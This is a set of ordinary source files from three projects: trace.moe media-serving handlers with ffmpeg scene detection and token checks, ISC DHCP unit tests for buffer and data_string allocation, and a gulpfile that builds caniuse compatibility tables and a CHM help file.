const videoFilePath = path.join(VIDEO_PATH, req.params.anilistID, req.params.filename);
if (!videoFilePath.startsWith(VIDEO_PATH)) {
return res.status(403).send("Forbidden");
}
if (!fs.existsSync(videoFilePath)) {
return res.status(404).send("Not found");
}
const size = req.query.size || "m";
if (!["l", "m", "s"].includes(size)) {
return res.status(400).send("Bad Request");
}
const minDuration = Number(req.query.minDuration) || 0.25;
try {
const scene = await detectScene(videoFilePath, t, minDuration > 2 ? 2 : minDuration);
if (scene === null) {
return res.status(500).send("Internal Server Error");
}
const video = generateVideoPreview(
videoFilePath,
scene.start,
scene.end,
size,
"mute" in req.query
);
res.set("Content-Type", "video/mp4");
res.set("x-video-start", scene.start);
res.set("x-video-end", scene.end);
res.set("x-video-duration", scene.duration);
res.set("Access-Control-Expose-Headers", "x-video-start, x-video-end, x-video-duration");
res.send(video);
} catch (e) {
console.log(e);
res.status(500).send("Internal Server Error");
}
};
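// Sketch of how a caller could derive a matching token (this simply mirrors the
// check at the top of the handler above; it is not a documented client API):
// const token = crypto
//   .createHash("sha1")
//   .update([anilistID, filename, t, TRACE_MEDIA_SALT].join(""))
//   .digest("base64")
//   .replace(/[^0-9A-Za-z]/g, "");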
<|start_filename|>src/file.js<|end_filename|>
import path from "path";
import fs from "fs-extra";
const { VIDEO_PATH = "/mnt/" } = process.env;
export default async (req, res) => {
const videoFilePath = path.join(VIDEO_PATH, req.params.anilistID, req.params.filename);
if (!videoFilePath.startsWith(VIDEO_PATH)) {
res.status(403).send("Forbidden");
return;
}
if (req.method === "GET") {
if (!fs.existsSync(videoFilePath)) {
return res.status(404).send("Not found");
}
const readStream = fs.createReadStream(videoFilePath);
readStream.on("open", () => {
res.set("Content-Type", "video/mp4");
readStream.pipe(res);
});
readStream.on("error", (err) => {
console.log(JSON.stringify(err, null, 2));
res.sendStatus(500);
});
} else if (req.method === "PUT") {
console.log(`Uploading ${videoFilePath}`);
fs.ensureDirSync(path.dirname(videoFilePath));
req.pipe(fs.createWriteStream(videoFilePath));
req.on("end", () => {
res.sendStatus(204);
console.log(`Uploaded ${videoFilePath}`);
});
} else if (req.method === "DELETE") {
console.log(`Deleting ${videoFilePath}`);
fs.removeSync(videoFilePath);
console.log(`Deleted ${videoFilePath}`);
res.sendStatus(204);
}
};
<|start_filename|>src/lib/detect-scene.js<|end_filename|>
import os from "os";
import path from "path";
import child_process from "child_process";
import fs from "fs-extra";
import Canvas from "canvas";
import getVideoDuration from "./get-video-duration.js";
export default async (filePath, t, minDuration) => {
if (t < 0) {
return null;
}
const videoDuration = getVideoDuration(filePath);
if (videoDuration === null || t > videoDuration) {
return null;
}
const tBefore = 5;
const tAfter = 5;
let trimStart = t - tBefore;
let trimEnd = t + tAfter;
if (t - tBefore < 0) {
trimStart = 0;
trimEnd = tBefore + tAfter;
}
if (t + tAfter > videoDuration) {
trimStart = videoDuration - tBefore - tAfter;
trimEnd = videoDuration;
}
const fps = 12;
const width = 32;
const height = 18;
const tempPath = path.join(os.tmpdir(), `videoPreview${process.hrtime().join("")}`);
fs.removeSync(tempPath);
fs.ensureDirSync(tempPath);
const ffmpeg = child_process.spawnSync(
"ffmpeg",
[
"-y",
"-ss",
trimStart - 10,
"-i",
filePath,
"-ss",
"10",
"-t",
trimEnd - trimStart,
"-an",
"-vf",
`fps=${fps},scale=${width}:${height}`,
`${tempPath}/%04d.jpg`,
],
{ encoding: "utf-8" }
);
// console.log(ffmpeg.stderr);
const imageDataList = await Promise.all(
fs.readdirSync(tempPath).map(
(file) =>
new Promise(async (resolve) => {
const canvas = Canvas.createCanvas(width, height);
const ctx = canvas.getContext("2d");
const image = await Canvas.loadImage(path.join(tempPath, file));
ctx.drawImage(image, 0, 0, width, height);
resolve(ctx.getImageData(0, 0, width, height).data);
})
)
);
fs.removeSync(tempPath);
const getImageDiff = (a, b) => {
let diff = 0;
for (let i = 0; i < a.length; i++) {
diff += Math.abs(a[i] - b[i]);
}
return Math.floor(diff / 1000);
};
const frameInfo = imageDataList
.map((curr, index, array) => getImageDiff(curr, index ? array[index - 1] : curr))
.map((curr, index) => ({
id: index,
diff: curr,
}));
const threshold = 50;
let centerFrameID = Math.floor((t - trimStart) * fps);
if (centerFrameID > frameInfo.length - 1) {
centerFrameID = frameInfo.length - 1;
}
const minFrames = (minDuration / 2) * fps;
let startFrameID = centerFrameID;
let endFrameID = centerFrameID;
for (let i = centerFrameID; i >= 0; i--) {
// compare with prev frame
if (i === 0 || (frameInfo[i].diff > threshold && centerFrameID - i > minFrames)) {
startFrameID = i;
break;
}
}
for (let i = centerFrameID; i < frameInfo.length; i++) {
// compare with next frame
if (
i + 1 === frameInfo.length ||
(frameInfo[i + 1].diff > threshold && i - centerFrameID > minFrames)
) {
endFrameID = i;
break;
}
}
// debug use
// frameInfo[centerFrameID] = Object.assign(frameInfo[centerFrameID], {center:true});
// frameInfo[startFrameID] = Object.assign(frameInfo[startFrameID], {start:true});
// frameInfo[endFrameID] = Object.assign(frameInfo[endFrameID], {end:true});
// console.log(frameInfo);
const sceneTrimStart = trimStart + startFrameID / fps;
const sceneTrimEnd = trimStart + endFrameID / fps;
return {
start: sceneTrimStart,
end: sceneTrimEnd,
duration: videoDuration,
};
};
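// Usage sketch (hypothetical path): resolves to a scene window around t, e.g.
// { start: 12.5, end: 14.25, duration: 1435.2 }, or null when t is negative or
// beyond the video duration.
// const scene = await detectScene("/mnt/21519/example.mp4", 13, 0.25);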
<|start_filename|>src/check-secret.js<|end_filename|>
const { TRACE_API_SECRET } = process.env;
export default async (req, res, next) => {
if (req.header("x-trace-secret") !== TRACE_API_SECRET) {
res.status(401).send("Unauthorized");
return;
}
next();
};
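// Client-side sketch (assumes the same TRACE_API_SECRET is shared out of band):
// await fetch("http://localhost:3000/list/21519", {
//   headers: { "x-trace-secret": process.env.TRACE_API_SECRET },
// });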
<|start_filename|>src/image.js<|end_filename|>
import path from "path";
import fs from "fs-extra";
import crypto from "crypto";
import child_process from "child_process";
const { VIDEO_PATH = "/mnt/", TRACE_MEDIA_SALT } = process.env;
const generateImagePreview = (filePath, t, size = "m") => {
const ffmpeg = child_process.spawnSync("ffmpeg", [
"-hide_banner",
"-loglevel",
"error",
"-nostats",
"-y",
"-ss",
t - 10,
"-i",
filePath,
"-ss",
"10",
"-vf",
`scale=${{ l: 640, m: 320, s: 160 }[size]}:-2`,
"-c:v",
"mjpeg",
"-vframes",
"1",
"-f",
"image2pipe",
"pipe:1",
]);
if (ffmpeg.stderr.length) {
console.log(ffmpeg.stderr.toString());
}
return ffmpeg.stdout;
};
export default async (req, res) => {
if (
TRACE_MEDIA_SALT &&
req.query.token !==
crypto
.createHash("sha1")
.update([req.params.anilistID, req.params.filename, req.query.t, TRACE_MEDIA_SALT].join(""))
.digest("base64")
.replace(/[^0-9A-Za-z]/g, "")
) {
res.status(403).send("Forbidden");
return;
}
const t = parseFloat(req.query.t);
if (isNaN(t) || t < 0) {
res.status(400).send("Bad Request. Invalid param: t");
return;
}
const videoFilePath = path.join(VIDEO_PATH, req.params.anilistID, req.params.filename);
if (!videoFilePath.startsWith(VIDEO_PATH)) {
res.status(403).send("Forbidden");
return;
}
if (!fs.existsSync(videoFilePath)) {
res.status(404).send("Not found");
return;
}
const size = req.query.size || "m";
if (!["l", "m", "s"].includes(size)) {
res.status(400).send("Bad Request. Invalid param: size");
return;
}
try {
const image = generateImagePreview(videoFilePath, t, size);
res.set("Content-Type", "image/jpg");
res.send(image);
} catch (e) {
console.log(e);
res.status(500).send("Internal Server Error");
}
};
| soruly/trace.moe-media |
<|start_filename|>common/tests/test_alloc.c<|end_filename|>
/*
* Copyright (c) 2007,2009,2012 by Internet Systems Consortium, Inc. ("ISC")
*
* We test the functions provided in alloc.c here. These are very
* basic functions, and it is very important that they work correctly.
*
* You can see two different styles of testing:
*
* - In the first, we have a single test for each function that tests
* all of the possible ways it can operate. (This is the case for
* the buffer tests.)
*
* - In the second, we have a separate test for each of the ways a
* function can operate. (This is the case for the data_string
* tests.)
*
* The advantage of a single test per function is that you have fewer
* tests, and less duplicated and extra code. The advantage of having
* a separate test is that each test is simpler. Plus if you need to
* allow certain tests to fail for some reason (known bugs that are
* hard to fix for example), then
*/
/** @TODO: dmalloc() test */
#include "config.h"
#include <atf-c.h>
#include "dhcpd.h"
ATF_TC(buffer_allocate);
ATF_TC_HEAD(buffer_allocate, tc) {
atf_tc_set_md_var(tc, "descr", "buffer_allocate basic test");
}
ATF_TC_BODY(buffer_allocate, tc) {
struct buffer *buf = 0;
/*
* Check a 0-length buffer.
*/
buf = NULL;
if (!buffer_allocate(&buf, 0, MDL)) {
atf_tc_fail("failed on 0-len buffer");
}
if (!buffer_dereference(&buf, MDL)) {
atf_tc_fail("buffer_dereference() failed");
}
if (buf != NULL) {
atf_tc_fail("buffer_dereference() did not NULL-out buffer");
}
/*
* Check an actual buffer.
*/
buf = NULL;
if (!buffer_allocate(&buf, 100, MDL)) {
atf_tc_fail("failed on allocate 100 bytes\n");
}
if (!buffer_dereference(&buf, MDL)) {
atf_tc_fail("buffer_dereference() failed");
}
if (buf != NULL) {
atf_tc_fail("buffer_dereference() did not NULL-out buffer");
}
/*
* Okay, we're happy.
*/
atf_tc_pass();
}
ATF_TC(buffer_reference);
ATF_TC_HEAD(buffer_reference, tc) {
atf_tc_set_md_var(tc, "descr", "buffer_reference basic test");
}
ATF_TC_BODY(buffer_reference, tc) {
struct buffer *a, *b;
/*
* Create a buffer.
*/
a = NULL;
if (!buffer_allocate(&a, 100, MDL)) {
atf_tc_fail("failed on allocate 100 bytes");
}
/**
* Confirm buffer_reference() doesn't work if we pass in NULL.
*
* @TODO: we should confirm we get an error message here.
*/
if (buffer_reference(NULL, a, MDL)) {
atf_tc_fail("succeeded on an error input");
}
/**
* @TODO: we should confirm we get an error message if we pass
* a non-NULL target.
*/
/*
* Confirm we work under normal circumstances.
*/
b = NULL;
if (!buffer_reference(&b, a, MDL)) {
atf_tc_fail("buffer_reference() failed");
}
if (b != a) {
atf_tc_fail("incorrect pointer returned");
}
if (b->refcnt != 2) {
atf_tc_fail("incorrect refcnt");
}
/*
* Clean up.
*/
if (!buffer_dereference(&b, MDL)) {
atf_tc_fail("buffer_dereference() failed");
}
if (!buffer_dereference(&a, MDL)) {
atf_tc_fail("buffer_dereference() failed");
}
}
ATF_TC(buffer_dereference);
ATF_TC_HEAD(buffer_dereference, tc) {
atf_tc_set_md_var(tc, "descr", "buffer_dereference basic test");
}
ATF_TC_BODY(buffer_dereference, tc) {
struct buffer *a, *b;
/**
* Confirm buffer_dereference() doesn't work if we pass in NULL.
*
* TODO: we should confirm we get an error message here.
*/
if (buffer_dereference(NULL, MDL)) {
atf_tc_fail("succeeded on an error input");
}
/**
* Confirm buffer_dereference() doesn't work if we pass in
* a pointer to NULL.
*
* @TODO: we should confirm we get an error message here.
*/
a = NULL;
if (buffer_dereference(&a, MDL)) {
atf_tc_fail("succeeded on an error input");
}
/*
* Confirm we work under normal circumstances.
*/
a = NULL;
if (!buffer_allocate(&a, 100, MDL)) {
atf_tc_fail("failed on allocate");
}
if (!buffer_dereference(&a, MDL)) {
atf_tc_fail("buffer_dereference() failed");
}
if (a != NULL) {
atf_tc_fail("non-null buffer after buffer_dereference()");
}
/**
* Confirm we get an error from negative refcnt.
*
* @TODO: we should confirm we get an error message here.
*/
a = NULL;
if (!buffer_allocate(&a, 100, MDL)) {
atf_tc_fail("failed on allocate");
}
b = NULL;
if (!buffer_reference(&b, a, MDL)) {
atf_tc_fail("buffer_reference() failed");
}
a->refcnt = 0; /* purposely set to invalid value */
if (buffer_dereference(&a, MDL)) {
atf_tc_fail("buffer_dereference() succeeded on error input");
}
a->refcnt = 2;
if (!buffer_dereference(&b, MDL)) {
atf_tc_fail("buffer_dereference() failed");
}
if (!buffer_dereference(&a, MDL)) {
atf_tc_fail("buffer_dereference() failed");
}
}
ATF_TC(data_string_forget);
ATF_TC_HEAD(data_string_forget, tc) {
atf_tc_set_md_var(tc, "descr", "data_string_forget basic test");
}
ATF_TC_BODY(data_string_forget, tc) {
struct buffer *buf;
struct data_string a;
const char *str = "Lorem ipsum dolor sit amet turpis duis.";
/*
* Create the string we want to forget.
*/
memset(&a, 0, sizeof(a));
a.len = strlen(str);
buf = NULL;
if (!buffer_allocate(&buf, a.len, MDL)) {
atf_tc_fail("out of memory");
}
if (!buffer_reference(&a.buffer, buf, MDL)) {
atf_tc_fail("buffer_reference() failed");
}
a.data = a.buffer->data;
memcpy(a.buffer->data, str, a.len);
/*
* Forget and confirm we've forgotten.
*/
data_string_forget(&a, MDL);
if (a.len != 0) {
atf_tc_fail("incorrect length");
}
if (a.data != NULL) {
atf_tc_fail("incorrect data");
}
if (a.terminated) {
atf_tc_fail("incorrect terminated");
}
if (a.buffer != NULL) {
atf_tc_fail("incorrect buffer");
}
if (buf->refcnt != 1) {
atf_tc_fail("too many references to buf");
}
/*
* Clean up buffer.
*/
if (!buffer_dereference(&buf, MDL)) {
atf_tc_fail("buffer_reference() failed");
}
}
ATF_TC(data_string_forget_nobuf);
ATF_TC_HEAD(data_string_forget_nobuf, tc) {
atf_tc_set_md_var(tc, "descr", "data_string_forget test, "
"data_string without buffer");
}
ATF_TC_BODY(data_string_forget_nobuf, tc) {
struct data_string a;
const char *str = "Lorem ipsum dolor sit amet massa nunc.";
/*
* Create the string we want to forget.
*/
memset(&a, 0, sizeof(a));
a.len = strlen(str);
a.data = (const unsigned char *)str;
a.terminated = 1;
/*
* Forget and confirm we've forgotten.
*/
data_string_forget(&a, MDL);
if (a.len != 0) {
atf_tc_fail("incorrect length");
}
if (a.data != NULL) {
atf_tc_fail("incorrect data");
}
if (a.terminated) {
atf_tc_fail("incorrect terminated");
}
if (a.buffer != NULL) {
atf_tc_fail("incorrect buffer");
}
}
ATF_TC(data_string_copy);
ATF_TC_HEAD(data_string_copy, tc) {
atf_tc_set_md_var(tc, "descr", "data_string_copy basic test");
}
ATF_TC_BODY(data_string_copy, tc) {
struct data_string a, b;
const char *str = "Lorem ipsum dolor sit amet orci aliquam.";
/*
* Create the string we want to copy.
*/
memset(&a, 0, sizeof(a));
a.len = strlen(str);
if (!buffer_allocate(&a.buffer, a.len, MDL)) {
atf_tc_fail("out of memory");
}
a.data = a.buffer->data;
memcpy(a.buffer->data, str, a.len);
/*
* Copy the string, and confirm it works.
*/
memset(&b, 0, sizeof(b));
data_string_copy(&b, &a, MDL);
if (b.len != a.len) {
atf_tc_fail("incorrect length");
}
if (b.data != a.data) {
atf_tc_fail("incorrect data");
}
if (b.terminated != a.terminated) {
atf_tc_fail("incorrect terminated");
}
if (b.buffer != a.buffer) {
atf_tc_fail("incorrect buffer");
}
/*
* Clean up.
*/
data_string_forget(&b, MDL);
data_string_forget(&a, MDL);
}
ATF_TC(data_string_copy_nobuf);
ATF_TC_HEAD(data_string_copy_nobuf, tc) {
atf_tc_set_md_var(tc, "descr", "data_string_copy test, "
"data_string without buffer");
}
ATF_TC_BODY(data_string_copy_nobuf, tc) {
struct data_string a, b;
const char *str = "Lorem ipsum dolor sit amet cras amet.";
/*
* Create the string we want to copy.
*/
memset(&a, 0, sizeof(a));
a.len = strlen(str);
a.data = (const unsigned char *)str;
a.terminated = 1;
/*
* Copy the string, and confirm it works.
*/
memset(&b, 0, sizeof(b));
data_string_copy(&b, &a, MDL);
if (b.len != a.len) {
atf_tc_fail("incorrect length");
}
if (b.data != a.data) {
atf_tc_fail("incorrect data");
}
if (b.terminated != a.terminated) {
atf_tc_fail("incorrect terminated");
}
if (b.buffer != a.buffer) {
atf_tc_fail("incorrect buffer");
}
/*
* Clean up.
*/
data_string_forget(&b, MDL);
data_string_forget(&a, MDL);
}
ATF_TP_ADD_TCS(tp)
{
ATF_TP_ADD_TC(tp, buffer_allocate);
ATF_TP_ADD_TC(tp, buffer_reference);
ATF_TP_ADD_TC(tp, buffer_dereference);
ATF_TP_ADD_TC(tp, data_string_forget);
ATF_TP_ADD_TC(tp, data_string_forget_nobuf);
ATF_TP_ADD_TC(tp, data_string_copy);
ATF_TP_ADD_TC(tp, data_string_copy_nobuf);
return (atf_no_error());
}
| xrg/dhcp-mageia-test |
<|start_filename|>gulpfile.js<|end_filename|>
"use strict";
const caniuse = require("caniuse-db/data");
const convertEncoding = require("gulp-convert-encoding");
const fs = require("fs-extra");
const gulp = require("gulp");
const log = require('fancy-log');
const htmlhint = require("gulp-htmlhint");
const iconv = require("iconv-lite");
const path = require("path");
const replace = require("gulp-replace");
const which = require("which");
const { JSDOM } = require("jsdom");
const classFix = {
p: "experimentsupport",
a: "partsupport",
n: "unsupport",
y: "support"
};
// Generate an indentation string of `num` tabs
function tab(num) {
return "\t".repeat(num);
}
// Compare two version numbers: returns > 0 if v1 > v2, < 0 if v1 < v2, and 0 if v1 == v2
function compare(v1, v2) {
v1 = convert(v1);
v2 = convert(v2);
let diff = 0;
for (let i = 0; (i < v1.length || i < v2.length) && diff === 0; i++) {
diff = (v1[i] || 0) - (v2[i] || 0);
}
return diff;
}
// Split a version number into an array of numeric parts by "."
function convert(ver) {
return /Edge/.test(ver) ? [12] : ver.toString().split(".").map(function(subVer) {
return +subVer || 0;
});
}
function getPrefix(bro, ver) {
bro = caniuse.agents[bro];
return (bro.prefix_exceptions || {})[ver] || bro.prefix;
}
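// Build the compatibility <table> markup for one caniuse feature: group each
// browser's versions by support status, collapse them into version ranges,
// then emit thead/tbody rows using the status classes defined above.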
function compatible(data, strPropName, propName, strIndent, indent) {
let status = data.stats;
let str = "<!-- compatible:" + strPropName + ' --><table class="g-data"><thead><tr>';
let thead = "";
let tbody = "";
let tabData = {};
let rowNum = 1;
for (let browserName in status) {
if (JSON.stringify(status[browserName]) === "{}") {
delete status[browserName];
continue;
}
thead += `<th><span class="browser-${ browserName }">${ caniuse.agents[browserName].browser.replace(/\s+/g, "<br>") }</span></th>`;
tabData[browserName] = {};
for (let browserVersion in status[browserName]) {
tbody = status[browserName][browserVersion];
if (propName === "viewport-units") {
tbody = tbody.replace(/(\s+#\d+)+$/, "");
}
if (!/\bu\b/i.test(tbody)) {
tbody = tbody.replace(/\bx\b/, function() {
return "-" + getPrefix(browserName, browserVersion) + "-";
});
// Special-case handling for Opera data
if (browserName === "opera" && browserVersion >= 13 && tbody === "y") {
tbody += getPrefix(browserName, browserVersion);
}
if (tabData[browserName][tbody]) {
tabData[browserName][tbody].push(browserVersion);
} else {
tabData[browserName][tbody] = [browserVersion];
}
}
}
// Special-case handling for Opera data
if (browserName === "opera" && !tabData[browserName]["y -webkit-"] && tabData[browserName].y) {
tabData[browserName].y = tabData[browserName].y.concat(tabData[browserName].ywebkit);
delete tabData[browserName].ywebkit;
}
for (let stats in tabData[browserName]) {
tbody = tabData[browserName][stats].join(",").split(/\s*[,-]\s*/g).sort(compare);
if (tbody.length === 1) {
tabData[browserName][stats] = tbody;
} else {
tabData[browserName][stats] = [tbody[0], tbody[tbody.length - 1]];
}
}
tbody = [];
for (let stats in tabData[browserName]) {
tbody.push({
supportInfo: /#(\d+)/.test(stats) ? (' <a href="#support' + RegExp.$1 + '">#' + RegExp.$1 + "</a>") : "",
className: ' class="' + classFix[stats.substr(0, 1)] + '"',
prefix: /(-\w+-)/.test(stats) ? (' <sup class="fix">' + RegExp.$1 + "</sup>") : "",
value: tabData[browserName][stats],
type: stats
});
}
tabData[browserName] = tbody.sort(function(a, b) {
return compare(a.value[0], b.value[0]);
});
rowNum = Math.max(rowNum, tbody.length);
}
for (let browserName in tabData) {
tbody = rowNum - tabData[browserName].length + 1;
tabData[browserName][tabData[browserName].length - 1].rowspan = tbody > 1 ? ' rowspan="' + tbody + '"' : "";
if (/^y\w*$/.test(tabData[browserName][tabData[browserName].length - 1].type) && tabData[browserName][tabData[browserName].length - 1].value.length > 1) {
tabData[browserName][tabData[browserName].length - 1].value = [tabData[browserName][tabData[browserName].length - 1].value[0] + "+"];
}
}
tbody = "";
for (let i = 0; i < rowNum; i++) {
tbody += "<tr>";
for (let browserName in status) {
if (tabData[browserName][i]) {
tbody += "<td" + (tabData[browserName][i].rowspan || "") + tabData[browserName][i].className + ">" + tabData[browserName][i].value.join("-") + tabData[browserName][i].prefix + tabData[browserName][i].supportInfo + "</td>";
}
}
tbody += "</tr>";
}
str += thead + "</tr></thead><tbody>" + tbody + "</tbody></table><!-- compatible:end -->";
str = strIndent + str.replace(/(\s*<\/?(ul|div|section|tr|t\w{2,})(\s[^>]+)*>\s*)/ig, "\n$1\n").replace(/(<\/(li|h\d|th|td)>\s*)/ig, "$1\n").replace(/\n+(<[\/\!]?(\w+)?)/g, indent);
return str;
}
// Automatically generate compatibility tables from caniuse.com data
function caniuseData(str, strIndent, strPropName, subName, index, html) {
strIndent = strIndent.match(/\t| {4}/g);
strIndent = strIndent ? tab(strIndent.length) : "";
// Indentation data for each generated tag
let indentData = {
thead: strIndent + tab(1),
tbody: strIndent + tab(1),
tr: strIndent + tab(2),
th: strIndent + tab(3),
td: strIndent + tab(3)
};
// Produce the indentation for a matched tag
function indent(s, tag, tagName) {
return "\r\n" + (indentData[tagName] || strIndent) + tag;
}
// Map CSS property names to their entry names in the caniuse database
let propFix = {
"repeating-linear-gradient()": "css-repeating-gradients",
"repeating-radial-gradient()": "css-repeating-gradients",
"linear-gradient()": "css-gradients",
"radial-gradient()": "css-gradients",
"user-select": "user-select-none",
"box-sizing": "css3-boxsizing",
"text-shadow": "textshadow",
"tab-size": "css3-tabsize",
"box-shadow": "boxshadow",
transform: "transforms2d",
"@media": "mediaqueries",
columns: "multicolumn",
vmax: "viewport-units",
vmin: "viewport-units",
vw: "viewport-units",
vh: "viewport-units",
"rgba": "css3-colors",
"hsla": "css3-colors",
"hsl": "css3-colors",
},
regPropSub = /((-\w+)+|\(\))$/,
regPropS = /s$/,
propName,
data;
caniuse.data["border-radius"].stats.safari["5"] = "y #1";
function getDate(prop) {
prop = propFix[prop] || prop;
data = caniuse.data[prop] || caniuse.data["css-" + prop];
if (!data && regPropSub.test(prop)) {
getDate(prop.replace(regPropSub, ""));
}
if (!data && !regPropS.test(prop)) {
getDate(prop + "s");
}
if (data) {
if (/^column-break\b/.test(propName)) {
// Clone the data
data = JSON.parse(JSON.stringify(data));
data.stats.firefox = JSON.parse(JSON.stringify(data.stats.firefox).replace(/"a\b[^"]*/g, "\"n"));
} else {
if (/^(vw|vh|vmin|(repeating-)?linear-gradient\(\)|columns|column(-\w+)*)$/.test(propName)) {
data = JSON.parse(JSON.stringify(data).replace(/"a\b/g, "\"y").replace(/\s*\#\d\"/g, "\""));
} else if (/^(vmax|(repeating-)?radial-gradient\(\))$/.test(propName)) {
data = JSON.parse(JSON.stringify(data).replace(/"a\b[^"]*/g, "\"n"));
}
// caniuse-db 1.0.30000013 introduced an odd Android version 37; not yet understood, so filter it out for now
for (let i in data.stats.android) {
if (i > 36) {
delete data.stats.android[i];
}
}
// Non-numeric version numbers are all removed
for (let browserName in data.stats) {
for (let verName in data.stats[browserName]) {
if (!/\d/.test(verName)) {
delete data.stats[browserName][verName];
}
}
}
}
propName = prop;
}
}
getDate(strPropName === "start" ? readDom(html, "#category").name : strPropName);
if (!data) {
if (propName) {
log.error("caniuse数据中无此项:\t" + propName);
} else {
log.error("未指定caniuse查询项目。");
}
} else {
str = compatible(data, strPropName, propName, strIndent, indent) || str;
}
return str;
}
// HTML fixes
gulp.task("htm", function() {
log("正在修复HTML文件");
return gulp.src(["**/*.htm", "**/*.html", "!**/node_modules/**/*", "!index.htm"])
.pipe(replace(/([\t ]*)<\!--\s*compatible\s*:\s*(\w+(-\w+)?)\s*-->[\s\S]*?<!--\s*compatible\s*:\s*end\s*-->/g, caniuseData))
.pipe(replace(/(\t|\n) {4,}/g, function(str, char) {
return char + tab(parseInt(str.length / 4));
}))
.pipe(replace(/<meta\s+charset=(["'])[\w-]+\1(?:\s+\/)?>/i, process.env.CI ? "<meta charset=\"gbk\">" : "<meta charset=\"utf-8\" />"))
.pipe(convertEncoding({to: process.env.CI ? "gbk" : "utf8"}))
.pipe(gulp.dest("."));
});
// Convert js files to GBK encoding (CI only)
gulp.task("gbk-js", function(cb) {
if (process.env.CI) {
log("正在修改js文件文件编码");
return gulp.src(["js/**/*.js"])
.pipe(convertEncoding({to: "gbk"}))
.pipe(gulp.dest("js"));
} else {
cb();
}
});
// HTML validation
gulp.task("lint", function() {
log("正在检查所有html文件代码是否合法");
return gulp.src(["**/*.htm", "**/*.html", "!**/node_modules/**/*"])
.pipe(htmlhint())
.pipe(htmlhint.reporter());
});
function readDom(html, selector) {
const dom = new JSDOM(html);
return dom.window.document.querySelector(selector);
}
function readTree() {
return fs.readFile("index.htm")
.then(html => readDom(html.toString(), "#dytree .unfold"))
.then(ul2array);
}
function li2obj(li) {
let link = li.querySelector("a");
let ul = li.querySelector("ul");
return {
html: link.innerHTML.replace(/"/g, "&quot;"),
link: link.href,
children: ul && ul2array(ul)
}
}
function ul2array(ul) {
return Array.from(ul.children).filter(tag => tag.tagName === "LI").map(li2obj)
}
let projWalkerPromise;
function projWalker() {
if (!projWalkerPromise) {
projWalkerPromise = fsWalker(".").then(files => {
return files.filter(file => {
return file.dir && file.dir !== "images" && !/^(ZeroClipboard\.swf|prefixfree\.min\.js|\w+\.psd)$/.test(file.name)
}).map(file => {
return file.path
}).sort()
});
}
return projWalkerPromise;
}
function fsWalker(rootDir) {
// Walk the children of the current directory
return fs.readdir(rootDir).then(subNames => {
// Promises for walking the subdirectories of the current directory
let subDirs = [];
// Files found directly in the current directory
let subFiles = [];
// Exclude `.*` and `node_modules`
subNames = subNames.filter(subName => {
return !/^(?:node_modules|\..*)$/i.test(subName);
}).map(subName => {
let subPath = path.join(rootDir, subName);
// Asynchronously stat each child
return fs.stat(subPath).then(stat => {
if (stat.isDirectory()) {
// The child is a directory, so recurse into it
subDirs.push(fsWalker(subPath));
} else {
// The child is a file
subFiles.push({
dir: rootDir === "." ? "" : rootDir,
name: subName,
path: subPath,
});
}
return stat;
});
});
// Wait for all fs.stat operations to finish
return Promise.all(subNames).then(() => {
// Collect the walk results of all subdirectories
return Promise.all(subDirs).then(subDirsChilds => {
// Merge the subdirectory results with this directory's files into one array
return subFiles.concat.apply(subFiles, subDirsChilds);
});
});
});
}
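// Recursively render the parsed navigation tree as HTML Help sitemap markup
// (<LI><OBJECT type="text/sitemap">...); with `nest` it emits nested <UL>
// lists plus ImageNumber params for the .hhc contents, otherwise a flat
// list for the .hhk index.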
function treeWalker(node, nest) {
if (Array.isArray(node)) {
let html = node.map(node => treeWalker(node, nest)).join("");
if (nest) {
html = `<UL>${ html }</UL>`;
}
return html
} else {
let ImageNumber = nest ? `<param name="ImageNumber" value="${ node.children ? 1 : (/\//.test(node.link) ? 11 : 15) }">` : "";
let html = `<LI><OBJECT type="text/sitemap"><param name="Name" value="${ node.html }"><param name="Local" value="${ node.link }">${ ImageNumber }</OBJECT>`;
if (node.children) {
html += treeWalker(node.children, nest);
}
return html;
}
}
function build() {
let hhcPath;
if (fs.existsSync("hhc.exe")) {
hhcPath = "hhc.exe";
} else {
try {
hhcPath = which.sync("hhc");
} catch (ex) {
//
}
if (!hhcPath) {
["ProgramFiles", "ProgramFiles(x86)", "ProgramW6432", "TEMP"]
.map(envName => process.env[envName])
.filter(Boolean)
.map(rogramDir => path.join(rogramDir, "HTML Help Workshop/hhc.exe"))
.some(exePath => {
if (fs.existsSync(exePath)) {
hhcPath = exePath;
return true;
}
});
}
}
let opener = require("opener");
if (hhcPath) {
let child_process = require("child_process");
return new Promise((resolve, reject) => {
log("正在编译chm");
child_process.exec("taskkill /F /IM hh.exe", function() {
child_process.execFile(hhcPath, [path.join(process.cwd(), "css.hhp")], (error, stdout, stderr) => {
if (stderr) {
reject(stderr);
} else {
if (stdout && /\s+Created\s+.+?,\s+[\d\,]+\s+\w+\s+/.test(stdout)) {
resolve(stdout);
} else {
reject(stderr || stdout || error);
}
}
});
});
})
.then(stdout => {
if (!process.env.CI) {
opener("css.chm");
}
log(stdout);
log("chm编译成功");
}).catch(stderr => {
log.error(stderr);
log.error("chm编译发生错误");
});
} else {
log.error("未找到hhc.exe,请安装[HTML Help Workshop](https://download.microsoft.com/download/0/A/9/0A939EF6-E31C-430F-A3DF-DFAE7960D564/htmlhelp.exe)");
opener("css.hhp");
return Promise.reject(hhcPath);
}
}
// Generate the chm file
gulp.task("chm", function() {
log("正在生成工程文件");
return Promise.all([
readTree(),
projWalker(),
]).then(function (results) {
let tree = results[0];
let files = results[1];
let pkg = require("./package.json");
let htmlHead = `<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN"><HTML><HEAD><meta name="GENERATOR" content="Microsoft® HTML Help Workshop 4.1"><!-- Sitemap 1.0 --></HEAD><BODY>`;
let hhc = `${ htmlHead }<OBJECT type="text/site properties"><param name="ExWindow Styles" value="0x200"><param name="Window Styles" value="0x800025"><param name="Font" value="MS Sans Serif,9,0"></OBJECT>${ treeWalker(tree, true) }</BODY></HTML>`;
let hhk = `${ htmlHead }<UL>${ treeWalker(tree) }</UL></BODY></HTML>`;
let hhp = "[OPTIONS]\nCompatibility=1.1 or later\nCompiled file=css.chm\nContents file=css.hhc\nDefault topic=quicksearch.htm\nDisplay compile progress=No\nFull-text search=Yes\nIndex file=css.hhk\nLanguage=0x804 中文(简体,中国)\nTitle=" + pkg.description + "\n\n\n[FILES]\n";
hhp += files.filter(path => {
if (/\.html?$/.test(path)) {
return false;
} else {
return true;
}
}).join("\n");
return Promise.all([
fs.writeFile("css.hhc", iconv.encode(hhc, "gbk")),
fs.writeFile("css.hhk", iconv.encode(hhk, "gbk")),
fs.writeFile("css.hhp", iconv.encode(hhp, "gbk")),
]);
}).then(build);
});
gulp.task("build", gulp.series("htm", "gbk-js", "chm"));
